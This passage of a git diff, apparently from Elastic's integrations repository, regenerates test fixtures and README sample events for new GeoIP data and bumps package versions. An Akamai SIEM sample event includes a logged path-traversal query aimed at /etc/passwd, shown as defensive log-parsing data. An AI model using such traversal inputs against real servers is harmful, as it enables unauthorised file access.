"Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", + "location": { + "lon": 15.6167, + "lat": 58.4167 + } + }, "as": { - "number": 14618, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "geo": { - "city_name": "Ashburn", - "continent_name": "North America", - "country_iso_code": "US", - "country_name": "United States", - "location": { - "lat": 39.0481, - "lon": -77.4728 - }, - "region_iso_code": "US-VA", - "region_name": "Virginia" - }, - "ip": "52.91.36.10" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tags": [ "akamai-siem", diff --git a/packages/akamai/docs/README.md b/packages/akamai/docs/README.md index 96b76a5d16d..edb632435cd 100644 --- a/packages/akamai/docs/README.md +++ b/packages/akamai/docs/README.md @@ -207,26 +207,26 @@ An example event for `siem` looks as following: } }, "client": { - "address": "52.91.36.10", + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", + "location": { + "lon": 15.6167, + "lat": 58.4167 + } + }, "as": { - "number": 14618, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "geo": { - "city_name": "Ashburn", - "continent_name": "North America", - "country_iso_code": "US", - "country_name": "United States", - "location": { - "lat": 39.0481, - "lon": -77.4728 - }, - "region_iso_code": "US-VA", - "region_name": "Virginia" - }, - "ip": "52.91.36.10" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "data_stream": { "dataset": "akamai.siem", @@ -249,7 +249,7 @@ An example event for `siem` looks as following: "id": "2ab418ac8515f33", "ingested": "2021-12-08T14:30:40Z", "kind": "event", - "original": "{\"attackData\":{\"clientIP\":\"52.91.36.10\",\"configId\":\"6724\",\"policyId\":\"scoe_5426\",\"ruleActions\":\"QUxFUlQ;REVOWQ==\",\"ruleData\":\"YWxlcnQo;Y3VybA==\",\"ruleMessages\":\"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=\",\"ruleSelectors\":\"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=\",\"ruleTags\":\"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND\",\"ruleVersions\":\";\",\"rules\":\"OTUwMDA0;OTkwMDEx\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"format\":\"json\",\"geo\":{\"asn\":\"12271\",\"city\":\"NEWYORK\",\"continent\":\"NA\",\"country\":\"US\",\"regionCode\":\"NY\"},\"httpMessage\":{\"bytes\":\"34523\",\"host\":\"www.example.com\",\"method\":\"POST\",\"path\":\"/examples/1/\",\"port\":\"80\",\"protocol\":\"http/2\",\"query\":\"a%3D..%2F..%2F..%2Fetc%2Fpasswd\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"2ab418ac8515f33\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml\",\"start\":\"1470923133.026\",\"status\":\"301\",\"tls\":\"TLSv1.2\"},\"type\":\"akamai_siem\",\"userRiskData\":{\"allow\":\"0\",\"general\":\"duc_1h:10|duc_1d:30\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"score\":\"75\",\"status\":\"0\",\"trust\":\"ugp:US\",\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\"},\"version\":\"1.0\"}", + "original": "{\"attackData\":{\"clientIP\":\"89.160.20.156\",\"configId\":\"6724\",\"policyId\":\"scoe_5426\",\"ruleActions\":\"QUxFUlQ;REVOWQ==\",\"ruleData\":\"YWxlcnQo;Y3VybA==\",\"ruleMessages\":\"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=\",\"ruleSelectors\":\"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=\",\"ruleTags\":\"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND\",\"ruleVersions\":\";\",\"rules\":\"OTUwMDA0;OTkwMDEx\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"format\":\"json\",\"geo\":{\"asn\":\"12271\",\"city\":\"NEWYORK\",\"continent\":\"NA\",\"country\":\"US\",\"regionCode\":\"NY\"},\"httpMessage\":{\"bytes\":\"34523\",\"host\":\"www.example.com\",\"method\":\"POST\",\"path\":\"/examples/1/\",\"port\":\"80\",\"protocol\":\"http/2\",\"query\":\"a%3D..%2F..%2F..%2Fetc%2Fpasswd\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"2ab418ac8515f33\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml\",\"start\":\"1470923133.026\",\"status\":\"301\",\"tls\":\"TLSv1.2\"},\"type\":\"akamai_siem\",\"userRiskData\":{\"allow\":\"0\",\"general\":\"duc_1h:10|duc_1d:30\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"score\":\"75\",\"status\":\"0\",\"trust\":\"ugp:US\",\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\"},\"version\":\"1.0\"}", "start": "2016-08-11T13:45:33.026Z" }, "host": { @@ -279,30 +279,30 @@ An example event for `siem` looks as following: }, "related": { "ip": [ - "52.91.36.10" + "89.160.20.156" ] }, "source": { - "address": "52.91.36.10", + "geo": { + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", + "location": { + "lon": 15.6167, + "lat": 58.4167 + } + }, "as": { - "number": 14618, + "number": 29518, "organization": { - "name": "Amazon.com, Inc." + "name": "Bredband2 AB" } }, - "geo": { - "city_name": "Ashburn", - "continent_name": "North America", - "country_iso_code": "US", - "country_name": "United States", - "location": { - "lat": 39.0481, - "lon": -77.4728 - }, - "region_iso_code": "US-VA", - "region_name": "Virginia" - }, - "ip": "52.91.36.10" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tags": [ "akamai-siem", diff --git a/packages/apache/changelog.yml b/packages/apache/changelog.yml index 565a75f4861..d8fdafddc9b 100644 --- a/packages/apache/changelog.yml +++ b/packages/apache/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.4" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.3.3" changes: - description: Change test public IPs to the supported subset diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-basic.log-expected.json b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-basic.log-expected.json index 481ed5c4e5d..3335a0c69df 100644 --- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-basic.log-expected.json +++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-basic.log-expected.json @@ -25,7 +25,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:30:29.903774500Z", + "ingested": "2021-12-14T14:34:05.105740618Z", "original": "::1 - - [26/Dec/2016:16:16:29 +0200] \"GET /favicon.ico HTTP/1.1\" 404 209", "category": "web", "kind": "event", @@ -45,17 +45,6 @@ ] }, { - "source": { - "address": "192.168.33.1", - "ip": "192.168.33.1" - }, - "url": { - "path": "/hello", - "original": "/hello" - }, - "tags": [ - "preserve_original_event" - ], "apache": { "access": {} }, @@ -76,8 +65,12 @@ "status_code": 404 } }, + "source": { + "address": "192.168.33.1", + "ip": "192.168.33.1" + }, "event": { - "ingested": "2021-12-09T13:30:29.903783200Z", + "ingested": "2021-12-14T14:34:05.105743350Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:13 +0000] \"GET /hello HTTP/1.1\" 404 499 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", @@ -87,6 +80,10 @@ "user": { "name": "-" }, + "url": { + "path": "/hello", + "original": "/hello" + }, "user_agent": { "name": "Firefox", "original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0", @@ -99,7 +96,10 @@ "name": "Mac" }, "version": "50.0." - } + }, + "tags": [ + "preserve_original_event" + ] }, { "apache": { @@ -119,7 +119,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:30:29.903788600Z", + "ingested": "2021-12-14T14:34:05.105743828Z", "original": "::1 - - [26/Dec/2016:16:16:48 +0200] \"-\" 408 -", "category": "web", "kind": "event", @@ -134,17 +134,6 @@ ] }, { - "source": { - "address": "172.17.0.1", - "ip": "172.17.0.1" - }, - "url": { - "path": "/stringpatch", - "original": "/stringpatch" - }, - "tags": [ - "preserve_original_event" - ], "apache": { "access": {} }, @@ -165,8 +154,12 @@ "status_code": 404 } }, + "source": { + "address": "172.17.0.1", + "ip": "172.17.0.1" + }, "event": { - "ingested": "2021-12-09T13:30:29.903792500Z", + "ingested": "2021-12-14T14:34:05.105744250Z", "original": "172.17.0.1 - - [29/May/2017:19:02:48 +0000] \"GET /stringpatch HTTP/1.1\" 404 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "category": "web", "kind": "event", @@ -176,6 +169,10 @@ "user": { "name": "-" }, + "url": { + "path": "/stringpatch", + "original": "/stringpatch" + }, "user_agent": { "name": "Firefox Alpha", "original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", @@ -188,20 +185,12 @@ "name": "Other" }, "version": "15.0.a2" - } - }, - { - "source": { - "address": "monitoring-server", - "domain": "monitoring-server" - }, - "url": { - "path": "/status", - "original": "/status" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "apache": { "access": {} }, @@ -222,8 +211,12 @@ "status_code": 200 } }, + "source": { + "address": "monitoring-server", + "domain": "monitoring-server" + }, "event": { - "ingested": "2021-12-09T13:30:29.903797600Z", + "ingested": "2021-12-14T14:34:05.105744722Z", "original": "monitoring-server - - [29/May/2017:19:02:48 +0000] \"GET /status HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "category": "web", "kind": "event", @@ -233,6 +226,10 @@ "user": { "name": "-" }, + "url": { + "path": "/status", + "original": "/status" + }, "user_agent": { "name": "Firefox Alpha", "original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", @@ -245,7 +242,10 @@ "name": "Other" }, "version": "15.0.a2" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "apache": { @@ -271,7 +271,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-09T13:30:29.903803900Z", + "ingested": "2021-12-14T14:34:05.105745119Z", "original": "127.0.0.1 - - [02/Feb/2019:05:38:45 +0100] \"-\" 408 152 \"-\" \"-\"", "category": "web", "kind": "event", @@ -293,18 +293,6 @@ ] }, { - "source": { - "address": "monitoring-server", - "domain": "monitoring-server" - }, - "url": { - "path": "/A Beka G1 Howe/029_AND_30/15 reading elephants.mp4", - "extension": "mp4", - "original": "/A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4" - }, - "tags": [ - "preserve_original_event" - ], "apache": { "access": {} }, @@ -325,8 +313,12 @@ "status_code": 200 } }, + "source": { + "address": "monitoring-server", + "domain": "monitoring-server" + }, "event": { - "ingested": "2021-12-09T13:30:29.903809300Z", + "ingested": "2021-12-14T14:34:05.105745518Z", "original": "monitoring-server - - [29/May/2017:19:02:48 +0000] \"GET /A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "category": "web", "kind": "event", @@ -336,6 +328,11 @@ "user": { "name": "-" }, + "url": { + "path": "/A Beka G1 Howe/029_AND_30/15 reading elephants.mp4", + "extension": "mp4", + "original": "/A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4" + }, "user_agent": { "name": "Firefox Alpha", "original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", @@ -348,7 +345,10 @@ "name": "Other" }, "version": "15.0.a2" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log-expected.json b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log-expected.json index c893102f466..b056c3dbb95 100644 --- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log-expected.json +++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log-expected.json @@ -25,7 +25,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:30:30.879403900Z", + "ingested": "2021-12-14T14:34:06.093531222Z", "original": "::1 - - [26/Dec/2016:16:16:28 +0200] \"GET / HTTP/1.1\" 200 45", "category": "web", "kind": "event", @@ -68,7 +68,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:30:30.879409400Z", + "ingested": "2021-12-14T14:34:06.093534426Z", "original": "::1 - - [26/Dec/2016:16:16:29 +0200] \"GET /favicon.ico HTTP/1.1\" 404 209", "category": "web", "kind": "event", @@ -105,7 +105,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:30:30.879413800Z", + "ingested": "2021-12-14T14:34:06.093534891Z", "original": "::1 - - [26/Dec/2016:16:16:48 +0200] \"-\" 408 -", "category": "web", "kind": "event", @@ -142,14 +142,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -162,7 +162,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:30:30.879418Z", + "ingested": "2021-12-14T14:34:06.093535376Z", "original": "89.160.20.156 - - [26/Dec/2016:18:23:35 +0200] \"GET / HTTP/1.1\" 200 45", "category": "web", "kind": "event", @@ -203,14 +203,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -223,7 +223,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:30:30.879422100Z", + "ingested": "2021-12-14T14:34:06.093535764Z", "original": "89.160.20.156 - - [26/Dec/2016:18:23:41 +0200] \"GET /notfound HTTP/1.1\" 404 206", "category": "web", "kind": "event", @@ -264,14 +264,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -284,7 +284,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:30:30.879427100Z", + "ingested": "2021-12-14T14:34:06.093536142Z", "original": "89.160.20.156 - - [26/Dec/2016:18:23:45 +0200] \"GET /hmm HTTP/1.1\" 404 201", "category": "web", "kind": "event", diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log-expected.json b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log-expected.json index 0964c3ba0d3..8d05c25b3a5 100644 --- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log-expected.json +++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log-expected.json @@ -34,7 +34,7 @@ "ip": "172.30.0.119" }, "event": { - "ingested": "2021-12-09T13:30:31.533065900Z", + "ingested": "2021-12-14T14:34:06.744087534Z", "original": "[10/Aug/2018:09:45:56 +0200] 172.30.0.119 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \"GET /nagiosxi/ajaxhelper.php?cmd=getxicoreajax\u0026amp;opts=%7B%22func%22%3A%22get_admin_tasks_html%22%2C%22args%22%3A%22%22%7D\u0026amp;nsp=b5c7d5d4b6f7d0cf0c92f9cbdf737f6a5c838218425e6ae21 HTTP/1.1\" 1375", "category": "web", "kind": "event", @@ -77,14 +77,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -97,7 +97,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:30:31.533074100Z", + "ingested": "2021-12-14T14:34:06.744090082Z", "original": "[16/Oct/2019:11:53:47 +0200] 89.160.20.156 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 \"GET /appl/ajaxhelper.php?cmd=getxicoreajax\u0026opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D\u0026nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1\" -", "category": "web", "kind": "event", diff --git a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log-expected.json b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log-expected.json index 21df2d32d2f..abd455abe8a 100644 --- a/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log-expected.json +++ b/packages/apache/data_stream/error/_dev/test/pipeline/test-error-basic.log-expected.json @@ -19,7 +19,7 @@ "ip": "192.168.33.1" }, "event": { - "ingested": "2021-12-09T13:30:33.868254100Z", + "ingested": "2021-12-14T14:34:09.255770595Z", "original": "[Mon Dec 26 16:22:08 2016] [error] [client 192.168.33.1] File does not exist: /var/www/favicon.ico", "category": "web", "type": "error", @@ -48,7 +48,7 @@ "level": "notice" }, "event": { - "ingested": "2021-12-09T13:30:33.868263600Z", + "ingested": "2021-12-14T14:34:09.255773246Z", "original": "[Mon Dec 26 16:15:55.103786 2016] [core:notice] [pid 11379] AH00094: Command line: '/usr/local/Cellar/httpd24/2.4.23_2/bin/httpd'", "category": "web", "type": "info", @@ -67,20 +67,32 @@ "id": 4328636416 } }, + "apache": { + "error": { + "module": "core" + } + }, + "file": { + "path": "/usr/local/apache2/htdocs/favicon.ico" + }, + "@timestamp": "2011-09-09T10:42:29.902+02:00", + "ecs": { + "version": "1.12.0" + }, "log": { "level": "error" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -92,30 +104,18 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, - "message": "File does not exist: /usr/local/apache2/htdocs/favicon.ico", - "tags": [ - "preserve_original_event" - ], - "apache": { - "error": { - "module": "core" - } - }, - "file": { - "path": "/usr/local/apache2/htdocs/favicon.ico" - }, - "@timestamp": "2011-09-09T10:42:29.902+02:00", - "ecs": { - "version": "1.12.0" - }, "event": { - "ingested": "2021-12-09T13:30:33.868270Z", + "ingested": "2021-12-14T14:34:09.255773777Z", "original": "[Fri Sep 09 10:42:29.902022 2011] [core:error] [pid 35708:tid 4328636416] [client 89.160.20.156] File does not exist: /usr/local/apache2/htdocs/favicon.ico", "category": "web", "type": "error", "timezone": "GMT+2", "kind": "event" - } + }, + "message": "File does not exist: /usr/local/apache2/htdocs/favicon.ico", + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -136,14 +136,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -157,7 +157,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:30:33.868275800Z", + "ingested": "2021-12-14T14:34:09.255774189Z", "original": "[Thu Jun 27 06:58:09.169510 2019] [include:warn] [pid 15934] [client 89.160.20.156:12345] AH01374: mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed: /test.html", "category": "web", "type": "error", diff --git a/packages/apache/manifest.yml b/packages/apache/manifest.yml index b63f137bed4..9cca4419584 100644 --- a/packages/apache/manifest.yml +++ b/packages/apache/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: apache title: Apache HTTP Server -version: 1.3.3 +version: 1.3.4 license: basic description: Collect logs and metrics from Apache servers with Elastic Agent. type: integration diff --git a/packages/atlassian_bitbucket/changelog.yml b/packages/atlassian_bitbucket/changelog.yml index a007d6f710c..b66475461bc 100644 --- a/packages/atlassian_bitbucket/changelog.yml +++ b/packages/atlassian_bitbucket/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.0.0" changes: - description: Initial draft of the package diff --git a/packages/atlassian_bitbucket/manifest.yml b/packages/atlassian_bitbucket/manifest.yml index 83bdb90f263..9a3243e91c2 100644 --- a/packages/atlassian_bitbucket/manifest.yml +++ b/packages/atlassian_bitbucket/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: atlassian_bitbucket title: Atlassian Bitbucket -version: 1.0.0 +version: 1.0.1 license: basic description: Collect logs from Atlassian Bitbucket with Elastic Agent. type: integration diff --git a/packages/atlassian_confluence/changelog.yml b/packages/atlassian_confluence/changelog.yml index ae4b2f05323..eda010500b4 100644 --- a/packages/atlassian_confluence/changelog.yml +++ b/packages/atlassian_confluence/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.0.0" changes: - description: Initial draft of the package diff --git a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json index 06d433ef68e..9d7c636c138 100644 --- a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json +++ b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json @@ -54,20 +54,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -75,7 +69,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222369782Z", + "ingested": "2021-12-14T14:34:31.513197127Z", "original": "{\"timestamp\":\"2021-11-23T00:44:36.398Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"79 - 178\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.166Z - 2021-11-23T00:43:12.188Z\"}]}", "type": "info", "kind": "event" @@ -143,20 +137,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -164,7 +152,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222374383Z", + "ingested": "2021-12-14T14:34:31.513199468Z", "original": "{\"timestamp\":\"2021-11-23T00:43:12.188Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 76\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"76\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:39:37.149Z\"}]}", "type": "info", "kind": "event" @@ -232,20 +220,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -253,7 +235,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T15:08:08.222376453Z", + "ingested": "2021-12-14T14:34:31.513199958Z", "original": "{\"timestamp\":\"2021-11-23T00:41:45.280Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"77 - 176\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.155Z - 